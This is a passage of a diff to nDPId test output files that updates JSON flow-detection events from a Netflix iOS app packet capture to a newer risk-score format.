+01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"}
-01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319054101,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319054101,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1484319054101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319054101,"pkt":"gCqoTGHM5JjWH70UCABFAABA9bFAAEAGZ9XAqAEHF\/YDjM+zAFBtwXYMAAAAALAC\/\/99\/AAAAgQFtAEDAwUBAQgKH2UImQAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1484319054132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319054132,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz7OFwt93bcF2DaAS\/\/\/aJAAAAgQFtAEDAwkEAggKhKDK7B9lCJk="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1484319054134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319054134,"pkt":"gCqoTGHM5JjWH70UCABFAAA0mQ1AAEAGxIXAqAEHF\/YDjM+zAFBtwXYNhcLfeIAQEBX4vQAAAQEICh9lCLmEoMrs"}
-01012{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1103,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319054101,"flow_last_seen":1484319054139,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":354,"flow_tot_l4_payload_len":354,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1484319054139,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.3.140","url":"23.246.3.140\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-8u4vlcPuFqcOLnLyb9DDtK-bB4&random=357509657","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056204,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056204,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1484319056204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056204,"pkt":"gCqoTGHM5JjWH70UCABFAABAfy9AAEAG1l7AqAEHF\/YLhc+0AFDwxwoWAAAAALAC\/\/9XEAAAAgQFtAEDAwUBAQgKH2UQewAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056210,"flow_last_seen":1484319056210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056210,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -190,7 +191,7 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1235,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1484319056219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056219,"pkt":"gCqoTGHM5JjWH70UCABFAAA0oIhAAEAGtRHAqAEHF\/YLhc+0AFDwxwoXZwEyloAQEBUoBwAAAQEICh9lEIg1aY+l"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056221,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056221,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -207,13 +208,13 @@
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
-01017{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
+01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"}
